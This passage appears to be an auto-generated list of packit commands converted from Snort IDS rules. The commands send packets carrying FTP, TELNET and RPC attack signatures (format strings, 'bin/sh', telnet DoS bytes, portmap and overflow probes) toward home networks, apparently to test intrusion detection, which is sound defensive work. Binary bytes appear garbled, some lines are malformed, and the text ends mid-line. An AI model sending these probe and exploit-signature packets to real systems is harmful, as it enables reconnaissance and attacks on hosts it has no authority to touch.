"FTP piss scan" classtype:suspicious-login sid:357 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "pass -saint" # "FTP saint scan" arachnids,330 classtype:suspicious-login sid:358 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "pass -satan" # "FTP satan scan" arachnids,329 classtype:suspicious-login sid:359 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "USER" -p "%" -p "%" # "FTP USER format string attempt" nocase-ignored bugtraq,7474 classtype:misc-attack sid:2178 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 21 -p "PASS" -p "%" -p "%" # "FTP PASS format string attempt" nocase-ignored bugtraq,7474 classtype:misc-attack sid:2179 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p " # Ž#€î#żě‚ŕ֐%ŕ" # "TELNET Solaris memory mismanagement exploit attempt" classtype:shellcode-detect sid:1430 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "_RLD" -p "bin/sh" # "TELNET SGI telnetd format bug" arachnids,304 classtype:attempted-admin sid:711 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "ld_library_path" # "TELNET ld_library_path" cve,CVE-1999-0073 arachnids,367 classtype:attempted-admin sid:712 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "˙ó˙ó˙ó˙ó˙ó" # "TELNET livingston DOS" arachnids,370 classtype:attempted-dos sid:713 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "resolv_host_conf" # "TELNET resolv_host_conf" arachnids,369 classtype:attempted-admin sid:714 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p "to su root" # "TELNET Attempted SU from wrong group" nocase-ignored classtype:attempted-admin sid:715 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p "not on system console" # "TELNET not on console" nocase-ignored arachnids,365 classtype:bad-unknown sid:717 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p "Login incorrect" # "TELNET login incorrect" arachnids,127 classtype:bad-unknown sid:718 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p "login: root" # "TELNET root login" classtype:suspicious-login sid:719 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p " [Yes] ˙ţ˙ý&" # "TELNET bsd telnet exploit response" classtype: attempted-admin bugtraq,3064 cve,CAN-2001-0554 sid:1252 #packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "˙ö˙ö˙ű˙ö" #Cannot convert: dsize:>200 "TELNET bsd exploit client finishing" classtype:successful-admin sid:1253 bugtraq,3064 cve,CAN-2001-0554 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "4Dgifts" # "TELNET 4Dgifts SGI account attempt" cve,CAN-1999-0501 classtype:suspicious-login sid:709 packit -t TCP -s $EXTERNAL_NET -d $TELNET_SERVERS --D 23 -p "OutOfBox" # "TELNET EZsetup account attempt" cve,CAN-1999-0501 classtype:suspicious-login sid:710 packit -t TCP -s $TELNET_SERVERS --S 23 -d $EXTERNAL_NET -p "˙ý˙ý˙ý#˙ý'˙ý\$" # "TELNET access" arachnids,08 cve,CAN-1999-0619 classtype:not-suspicious sid:716 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,2048,12,relative "RPC portmap proxy integer overflow attempt TCP" cve,CAN-2003-0028 bugtraq,7123 classtype:rpc-portmap-decode sid:2093 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,2048,12,relative "RPC portmap proxy integer overflow attempt UDP" classtype:rpc-portmap-decode cve,CAN-2003-0028 bugtraq,7123 sid:2092 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap proxy attempt TCP" classtype:rpc-portmap-decode sid:1922 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap proxy attempt UDP" classtype:rpc-portmap-decode sid:1923 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap listing UDP 111" arachnids,428 classtype:rpc-portmap-decode sid:1280 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap listing TCP 111" arachnids,428 classtype:rpc-portmap-decode sid:598 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap SET attempt TCP 111" classtype:rpc-portmap-decode sid:1949 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap SET attempt UDP 111" classtype:rpc-portmap-decode sid:1950 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap UNSET attempt TCP 111" bugtraq,1892 classtype:rpc-portmap-decode sid:2014 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "" # "RPC portmap UNSET attempt UDP 111" bugtraq,1892 classtype:rpc-portmap-decode sid:2015 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 32771 -p "† " -p "" -p "" # "RPC portmap listing TCP 32771" arachnids,429 classtype:rpc-portmap-decode sid:599 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 32771 -p "† " -p "" -p "" # "RPC portmap listing UDP 32771" arachnids,429 classtype:rpc-portmap-decode sid:1281 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡‹" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cachefsd request UDP" cve,CAN-2002-0084 bugtraq,4674 classtype:rpc-portmap-decode sid:1746 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡‹" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cachefsd request TCP" cve,CAN-2002-0084 bugtraq,4674 classtype:rpc-portmap-decode sid:1747 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¨" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rwalld request UDP" classtype:rpc-portmap-decode sid:1732 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¨" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rwalld request TCP" classtype:rpc-portmap-decode sid:1733 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†÷" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap admind request UDP" arachnids,18 classtype:rpc-portmap-decode sid:575 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†÷" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap admind request TCP" arachnids,18 classtype:rpc-portmap-decode sid:1262 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap amountd request UDP" arachnids,19 classtype:rpc-portmap-decode sid:576 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap amountd request TCP" arachnids,19 classtype:rpc-portmap-decode sid:1263 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ş" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap bootparam request UDP" cve,CAN-1999-0647 arachnids,16 classtype:rpc-portmap-decode sid:577 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ş" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap bootparam request TCP" cve,CAN-1999-0647 arachnids,16 classtype:rpc-portmap-decode sid:1264 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡Ě" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nisd request UDP" arachnids,21 classtype:rpc-portmap-decode sid:580 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡Ě" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nisd request TCP" arachnids,21 classtype:rpc-portmap-decode sid:1267 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "Iń" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap pcnfsd request UDP" arachnids,22 classtype:rpc-portmap-decode sid:581 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "Iń" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap pcnfsd request TCP" arachnids,22 classtype:rpc-portmap-decode sid:1268 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rexd request UDP" arachnids,23 classtype:rpc-portmap-decode sid:582 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rexd request TCP" arachnids,23 classtype:rpc-portmap-decode sid:1269 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†˘" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rusers request UDP" cve,CVE-1999-0626 arachnids,133 classtype:rpc-portmap-decode sid:584 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†˘" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rusers request TCP" cve,CVE-1999-0626 arachnids,133 classtype:rpc-portmap-decode sid:1271 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†˘" -p "" -p "" # "RPC rusers query UDP" cve,CVE-1999-0626 classtype:attempted-recon sid:612 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ż" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap selection_svc request UDP" arachnids,25 classtype:rpc-portmap-decode sid:586 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ż" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap selection_svc request TCP" arachnids,25 classtype:rpc-portmap-decode sid:1273 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¸" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap status request UDP" arachnids,15 classtype:rpc-portmap-decode sid:587 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¸" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap status request TCP" arachnids,15 classtype:rpc-portmap-decode sid:2016 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡™" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap snmpXdmi request TCP" cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html bugtraq,2417 classtype:rpc-portmap-decode sid:593 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡™" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap snmpXdmi request UDP" cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html bugtraq,2417 classtype:rpc-portmap-decode sid:1279 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡™" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC snmpXdmi overflow attempt TCP" bugtraq,2417 cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html classtype:attempted-admin sid:569 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡™" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC snmpXdmi overflow attempt UDP" bugtraq,2417 cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html classtype:attempted-admin sid:2045 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷u" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap espd request UDP" cve,CAN-2001-0331 classtype:rpc-portmap-decode sid:2017 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷u" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap espd request TCP" cve,CAN-2001-0331 classtype:rpc-portmap-decode sid:595 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 1024: -p "†¸" -p "" -p "%x %x" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC status GHBN format string attack" bugtraq,1480 cve,CVE-2000-0666 classtype:misc-attack sid:1890 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 1024: -p "†¸" -p "" -p "%x %x" -p "" #Cannot convert: Unrecognized flow type to_server, established byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC status GHBN format string attack" bugtraq,1480 cve,CVE-2000-0666 classtype: misc-attack sid:1891 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap mountd request UDP" arachnids,13 classtype:rpc-portmap-decode sid:579 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap mountd request TCP" arachnids,13 classtype:rpc-portmap-decode sid:1266 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP export request" arachnids,26 classtype:attempted-recon sid:574 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP export request" arachnids,26 classtype:attempted-recon sid:1924 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP exportall request" arachnids,26 classtype:attempted-recon sid:1925 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP exportall request" arachnids,26 classtype:attempted-recon sid:1926 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1023,0,relative "RPC mountd TCP mount path overflow attempt" sid:2184 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1023,0,relative "RPC mountd UDP mount path overflow attempt" classtype:misc-attack sid:2185 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP mount request" classtype:attempted-recon sid:1951 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP mount request" classtype:attempted-recon sid:1952 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP dump request" classtype:attempted-recon sid:2018 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP dump request" classtype:attempted-recon sid:2019 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP unmount request" classtype:attempted-recon sid:2020 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP unmount request" classtype:attempted-recon sid:2021 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP unmountall request" classtype:attempted-recon sid:2022 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP unmountall request" classtype:attempted-recon sid:2023 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,512,0,relative "RPC AMD UDP amqproc_mount plog overflow attempt" cve,CVE-1999-0704 bugtraq,614 classtype:misc-attack sid:1905 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,512,0,relative "RPC AMD TCP amqproc_mount plog overflow attempt" cve,CVE-1999-0704 bugtraq,614 classtype:misc-attack sid:1906 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p " " -p "" # "RPC AMD TCP pid request" classtype:rpc-portmap-decode sid:1953 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p " " -p "" # "RPC AMD UDP pid request" classtype:rpc-portmap-decode sid:1954 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" # "RPC AMD TCP version request" classtype:rpc-portmap-decode sid:1955 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" # "RPC AMD UDP version request" classtype:rpc-portmap-decode sid:1956 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ä" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cmsd request UDP" arachnids,17 classtype:rpc-portmap-decode sid:578 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ä" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cmsd request TCP" arachnids,17 classtype:rpc-portmap-decode sid:1265 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,0,relative "RPC CMSD UDP CMSD_CREATE buffer overflow attempt" cve,CVE-1999-0696 bugtraq,524 classtype:attempted-admin sid:1907 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,0,relative "RPC CMSD TCP CMSD_CREATE buffer overflow attempt" cve,CVE-1999-0696 bugtraq,524 classtype:attempted-admin sid:1908 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC CMSD UDP CMSD_CREATE array buffer overflow attempt" cve,CAN-2002-0391 bugtraq,5356 classtype:attempted-admin sid:2094 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC CMSD TCP CMSD_CREATE array buffer overflow attempt" cve,CAN-2002-0391 bugtraq,5356 classtype:attempted-admin sid:2095 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,1000,28,relative "RPC CMSD TCP CMSD_INSERT buffer overflow attempt" cve,CVE-1999-0696 url,www.cert.org/advisories/CA-99-08-cmsd.html classtype:misc-attack sid:1909 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,1000,28,relative "RPC CMSD udp CMSD_INSERT buffer overflow attempt" cve,CVE-1999-0696 url,www.cert.org/advisories/CA-99-08-cmsd.html classtype:misc-attack sid:1910 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡ˆ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap sadmind request TCP" arachnids,20 classtype:rpc-portmap-decode sid:1272 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡ˆ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap sadmind request UDP" arachnids,20 classtype:rpc-portmap-decode sid:585 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,124,relative,align byte_jump:4,20,relative,align byte_test:4,>,512,4,relative "RPC sadmind UDP NETMGT_PROC_SERVICE CLIENT_DOMAIN overflow attempt" cve,CVE-1999-0977 bugtraq,866 classtype:attempted-admin sid:1911 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,124,relative,align byte_jump:4,20,relative,align byte_test:4,>,512,4,relative "RPC sadmind TCP NETMGT_PROC_SERVICE CLIENT_DOMAIN overflow attempt" cve,CVE-1999-0977 bugtraq,866 classtype:attempted-admin sid:1912 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" # "RPC sadmind UDP PING" bugtraq,866 classtype:attempted-admin sid:1957 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" # "RPC sadmind TCP PING" bugtraq,866 classtype:attempted-admin sid:1958 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rstatd request UDP" arachnids,10 classtype:rpc-portmap-decode sid:583 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rstatd request TCP" arachnids,10 classtype:rpc-portmap-decode sid:1270 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD UDP stat mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1913 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD TCP stat mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1914 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD UDP monitor mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1915 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD TCP monitor mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1916 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ź" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypupdated request UDP" arachnids,125 classtype:rpc-portmap-decode sid:1277 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ź" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypupdated request TCP" arachnids,125 classtype:rpc-portmap-decode sid:591 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ź" -p "" -p " -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align check backslash escaping. "RPC ypupdated arbitrary command attempt UDP" classtype:misc-attack sid:2088 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ź" -p "" -p " -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align check backslash escaping. "RPC ypupdated arbitrary command attempt TCP" classtype:misc-attack sid:2089 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ł" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap NFS request UDP" classtype:rpc-portmap-decode sid:1959 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ł" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap NFS request TCP" classtype:rpc-portmap-decode sid:1960 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ť" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap RQUOTA request UDP" classtype:rpc-portmap-decode sid:1961 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ť" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap RQUOTA request TCP" classtype:rpc-portmap-decode sid:1962 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ť" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC RQUOTA getquota overflow attempt UDP" cve,CVE-1999-0974 bugtraq,864 classtype:misc-attack sid:1963 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ť" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC RQUOTA getquota overflow attempt TCP" cve,CVE-1999-0974 bugtraq,864 classtype:misc-attack sid:2024 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ó" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ttdbserv request UDP" bugtraq,122 arachnids,24 cve,CAN-2001-0717 cve,CVE-1999-0003 cve,CVE-1999-0687 cve,CAN-1999-1075 url,www.cert.org/advisories/CA-2001-05.html classtype:rpc-portmap-decode sid:588 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ó" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ttdbserv request TCP" bugtraq,122 arachnids,24 cve,CAN-2001-0717 cve,CVE-1999-0003 cve,CVE-1999-0687 cve,CAN-1999-1075 url,www.cert.org/advisories/CA-2001-05.html classtype:rpc-portmap-decode sid:1274 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC tooltalk UDP overflow attempt" cve,CVE-1999-0003 bugtraq,122 classtype:misc-attack sid:1964 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC tooltalk TCP overflow attempt" cve,CVE-1999-0003 bugtraq,122 classtype:misc-attack sid:1965 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Š" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap yppasswd request UDP" arachnids,14 classtype:rpc-portmap-decode sid:589 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Š" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap yppasswd request TCP" arachnids,14 classtype:rpc-portmap-decode sid:1275 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,64,0,relative "RPC yppasswd old password 